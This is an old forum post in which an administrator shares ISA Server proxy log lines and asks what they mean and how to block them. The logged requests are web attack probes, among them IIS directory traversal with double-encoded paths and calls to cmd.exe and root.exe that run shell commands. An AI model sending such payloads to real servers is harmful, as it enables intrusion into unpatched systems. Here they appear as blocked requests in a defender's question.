Hi All, Iam also getting the same scripts in ISA Logs. But I see in my logs the 401 message indicating ISA did not allow the script to be executed, is that the case? Below is the scripts i found in ISA Logs. What is that script www/c/wint/system32..... what exactly is someone trying to do, How do I block these scripts from getting executed. Please let me know urgently. anonymous - N 2002-02-20 01:21:01 w3proxy ISA - www - - - 70 3518 http TCP GET http://www/MSADC/root.exe?/c+dir - - 401 - - - anonymous - N 2002-02-20 01:21:03 w3proxy ISA - www - - - 80 3518 http TCP GET http://www/c/winnt/system32/cmd.exe?/c+dir - - 401 - - - anonymous - N 2002-02-20 01:21:05 w3proxy ISA - www - - - 80 3518 http TCP GET http://www/d/winnt/system32/cmd.exe?/c+dir - - 401 - - - anonymous - N 2002-02-20 01:21:07 w3proxy ISA - www - - - 96 3518 http TCP GET http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir - - 401 - - - - - Regards, vinay.